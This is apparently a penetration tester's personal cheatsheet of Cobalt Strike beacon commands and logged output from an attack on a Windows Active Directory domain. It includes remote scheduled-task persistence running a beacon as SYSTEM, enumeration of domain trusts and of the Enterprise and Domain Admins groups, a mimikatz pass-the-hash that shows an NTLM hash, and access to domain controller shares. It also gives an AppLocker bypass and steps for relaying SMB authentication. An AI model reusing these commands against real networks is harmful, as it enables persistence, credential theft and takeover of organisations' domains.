k54_Cheatsheet_Notes

1.  
2. Quickie Pastable
3. shell schtasks /create /S 192.168.105.104 /TN X-Cobalt-Strike-Remote-Persistence /TR C:\WIndows\System32\testbeacon.exe /SC ONSTART /RU SYSTEM
4. shell schtasks /run /S 192.168.105.104 /TN X-Cobalt-Strike-Remote-Persistence
5.  
6.  
7. # Finding Trust Domain Relationships in DSQUery. use to find thngs like Admins oe Enterpise Admins that we can reuse credentials in a whole different domain (ie the Austin Gretechel scenarios)
8. shell dsquery * -filter (objectclass=trusteddomain) -attr flatname trusttype trustdirection -l
9.  
10.  
11. Tip 1) Bounce back between runnign dsquery from system and froman actual user account due ot issues with some users not being authenticated
12.  
13. ----
14. shell dsquery * -filter "(objectclass=computer)" -attr description samaccountname name operatingsystem dnshostname -d gretchel
15. [*] Tasked beacon to run: dsquery * -filter "(objectclass=computer)" -attr description samaccountname name operatingsystem dnshostname -d gretchel
16. [+] host called home, sent: 154 bytes
17. [+] received output:
18. dsquery failed:The server is not operational.
19. type dsquery /? for help.
20. [+] received output:
21. description samaccountname name operatingsystem dnshostname
22. GRETCHEL-DC1$ GRETCHEL-DC1 Windows Server 2012 R2 Standard gretchel-DC1.gretchel.local
23.  
24.  
25.  
26. [*] Tasked beacon to run: dsget group "CN=Enterprise Admins,CN=Users,DC=gretchel,DC=local" -members
27. [+] host called home, sent: 104 bytes
28. [+] received output:
29. "CN=Danson\, chris M,OU=Users,OU=IT,OU=HQ,DC=gretchel,DC=local"
30. "CN=Lazarus\, Alan W,OU=Users,OU=IT,OU=HQ,DC=gretchel,DC=local"
31. "CN=Laredo\, Daryl S,OU=Users,OU=IT,OU=HQ,DC=gretchel,DC=local"
32. "CN=Chen\, Tony F,OU=Users,OU=IT,OU=HQ,DC=gretchel,DC=local"
33. "CN=Administrator,CN=Users,DC=gretchel,DC=local"
34.  
35. shell dsget group "CN=Domain Admins,CN=Users,DC=gretchel,DC=local" -members
36. [*] Tasked beacon to run: dsget group "CN=Domain Admins,CN=Users,DC=gretchel,DC=local" -members
37. [+] host called home, sent: 100 bytes
38. [+] received output:
39. "CN=Administrator,CN=Users,DC=gretchel,DC=local
40.  
41. beacon> shell nslookup gretchel-dc1
42. [*] Tasked beacon to run: nslookup gretchel-dc1
43. [+] host called home, sent: 52 bytes
44. [+] received output:
45. Server: gretchel-dc1.gretchel.local
46. Address: 172.16.1.10
47.  
48. eacon> shell dsquery server -forest
49. [*] Tasked beacon to run: dsquery server -forest
50. [+] host called home, sent: 53 bytes
51. [+] received output:
52. "CN=GRETCHEL-DC1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=gretchel,DC=local"
53. "CN=AUS-DC1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=gretchel,DC=local"
54. "CN=CHI-DC1,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=gretchel,DC=local"
55. "CN=CHI-DC2,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=gretchel,DC=local"
56. ----
57. Weirdness around ls/shell dir of the directory on the parent DC. ONly wokred when i used builtin ls of CS
58.  
59. beacon> shell dir \\172.16.1.10\C$
60. [*] Tasked beacon to run: dir \\172.16.1.10\C$
61. [+] host called home, sent: 51 bytes
62. [-] could not spawn C:\Windows\system32\cmd.exe /C dir \\172.16.1.10\C$ (token) with extended startup information. Reset ppid, disable blockdlls, or rev2self to drop your token.
63. beacon> pth GRETCHEL.local\chris.danson.ea eda099c1520936a2966ab0c04b7a7296
64. [*] Tasked beacon to run mimikatz's sekurlsa::pth /user:chris.danson.ea /domain:GRETCHEL.local /ntlm:eda099c1520936a2966ab0c04b7a7296 /run:"%COMSPEC% /c echo 12719d8990e > \\.\pipe\4b2017" command
65. [+] host called home, sent: 297614 bytes
66. [+] Impersonated NT AUTHORITY\SYSTEM
67. [+] received output:
68. user : chris.danson.ea
69. domain : GRETCHEL.local
70. program : C:\Windows\system32\cmd.exe /c echo 12719d8990e > \\.\pipe\4b2017
71. impers. : no
72. NTLM : eda099c1520936a2966ab0c04b7a7296
73. | PID 3856
74. | TID 2496
75. | LSA Process is now R/W
76. | LUID 0 ; 190663225 (00000000:0b5d4a39)
77. \_ msv1_0 - data copy @ 000000D74557AFA0 : OK !
78. \_ kerberos - data copy @ 000000D745528F38
79. \_ aes256_hmac -> null
80. \_ aes128_hmac -> null
81. \_ rc4_hmac_nt OK
82. \_ rc4_hmac_old OK
83. \_ rc4_md4 OK
84. \_ rc4_hmac_nt_exp OK
85. \_ rc4_hmac_old_exp OK
86. \_ *Password replace @ 000000D74560B0F8 (16) -> null
87.  
88. beacon> shell dir \\GRETCHEL-DC1\C$
89. [*] Tasked beacon to run: dir \\GRETCHEL-DC1\C$
90. [+] host called home, sent: 52 bytes
91. [-] could not spawn C:\Windows\system32\cmd.exe /C dir \\GRETCHEL-DC1\C$ (token) with extended startup information. Reset ppid, disable blockdlls, or rev2self to drop your token.
92. beacon> ls \\GRETCHEL-DC1\C$
93. [*] Tasked beacon to list files in \\GRETCHEL-DC1\C$
94. [+] host called home, sent: 35 bytes
95. [*] Listing: \\GRETCHEL-DC1\C$\
96.  
97.  
98. beacon> ls \\GRETCHEL-DC1\sysvol
99. [*] Tasked beacon to list files in \\GRETCHEL-DC1\sysvol
100. [+] host called home, sent: 39 bytes
101. [*] Listing: \\GRETCHEL-DC1\sysvol\
102.  
103. Size Type Last Modified Name
104. ---- ---- ------------- ----
105. dir 08/09/2022 09:54:27 gretchel.local
106.  
107.  
108. ### Rev2Self verifies that you do need pass the hash as now i cant ls the anything
109. beacon> rev2self
110. [*] Tasked beacon to revert token
111. [+] host called home, sent: 8 bytes
112. beacon> ls \\GRETCHEL-DC1\sysvol
113. [*] Tasked beacon to list files in \\GRETCHEL-DC1\sysvol
114. [+] host called home, sent: 39 bytes
115. [-] could not open \\GRETCHEL-DC1\sysvol\*: 5
116. beacon> ls \\GRETCHEL-DC1\C$
117. [*] Tasked beacon to list files in \\GRETCHEL-DC1\C$
118. [+] host called home, sent: 35 bytes
119. [-] could not open \\GRETCHEL-DC1\C$\*: 5
120.  
121.  
122. #### How to FInd the the 2F token number used as thier logon samaccount ID for the Workstation Admin accounts that have remote logon capaiblity using DSQUERY
123.  
124.  
125.  
126. ### Socks
127. gotta have SOCKS AND PORTFWD together they aren't interchangeable. when trying to hit th e ssh port thru socks/proxychains
128.  
129.  
130.  
131. beacon> reg query x64 HKLM\software\policies\microsoft\windows\srpv2\Script\9428c672-5fc3-47f4-808a-a0011f36dd2c
132. [*] Tasked beacon to query HKLM\software\policies\microsoft\windows\srpv2\Script\9428c672-5fc3-47f4-808a-a0011f36dd2c (x64)
133. [+] host called home, sent: 2701 bytes
134. [+] received output:
135. Value <FilePathRule Id="9428c672-5fc3-47f4-808a-a0011f36dd2c" Name="(Default Rule) All scripts located in the Windows folder" Description="Allows members of the Everyone group to run scripts that are located in the Windows folder." UserOrGroupSid="S-1-1-0" Action="Allow"><Conditions><FilePathCondition Path="%WINDIR%\*"/></Conditions></FilePathRule>
136.  
137.  
138. beacon> reg query x64 HKLM\software\policies\microsoft\windows\srpv2\Script\ed97d0cb-15ff-430f-b82c-8d7832957725
139. [*] Tasked beacon to query HKLM\software\policies\microsoft\windows\srpv2\Script\ed97d0cb-15ff-430f-b82c-8d7832957725 (x64)
140. [+] host called home, sent: 2701 bytes
141. [+] received output:
142. Value <FilePathRule Id="ed97d0cb-15ff-430f-b82c-8d7832957725" Name="(Default Rule) All scripts" Description="Allows members of the local Administrators group to run all scripts." UserOrGroupSid="S-1-5-32-544" Action="Allow"><Conditions><FilePathCondition Path="*"/></Conditions></FilePathRule>
143.  
144.  
145. # The syntax to use DSQUERY.exe thru an Application Whitelist Bypass custom C# code
146. # beacon> execute-assembly /mnt/supershare/applocker-bypas/applby.exe C:\transfer\dsquery.exe * -filter *
147.  
148.  
149. # PortForwarding to Relay SMB Authentication Requires some KEY THINGS
150.  
151. Cobalt Strike Client ---> CS Teamserver ----> Customer Machine on Local Customer Network ----> Customer Target Domain Controller for SMB Auth
152. 1 2 3 4
153.  
154. 1. The porfwd should be run on machine 3 with the target ip of the DC (machine 4) and target port (445)
155. 2. The SMB Auth relay via Pass-The-Hash must be relayed thru an additional (not depicted in the diagram) machine that is a Windows box with an implant calling back to teamserver as SYSTEM.
156. 3. On the Windows Relayer box change the /etc/hosts file to make an DNSname alias for the Target Customer Domain controller but put hte IP as the out-of-band for the Kali Teamserver IP
157. 4. Execute the pass-the-hash on the beacon that corresponsds to your Windows Relayer box. Make sure your SYSTEM
158. 5. Execute all "passing queries" on the Windows Relayer Box. (shell dir \\TARGETDC\C$\)
159.  
160.  
161.  
162.  
163. ------
164. When get error:
165. dsquery failed:The operation being requested was not performed because the user has not been authenticated.
166. type dsquery /? for help.
167.  
168. try to run with the '-d' parameter if usig cross-domain trust
169. beacon> shell dsquery * -filter (name=*web*) -attr * -d austin
170. [*] Tasked beacon to run: dsquery * -filter (name=*web*) -attr * -d austin
171. [+] host called home, sent: 79 bytes
172. [+] received output:
173. objectClass: top
174. objectClass: person
175. objectClass: organizationalPerson
176. objectClass: user
177. objectClass: computer
178. cn: AUS-WEB
179.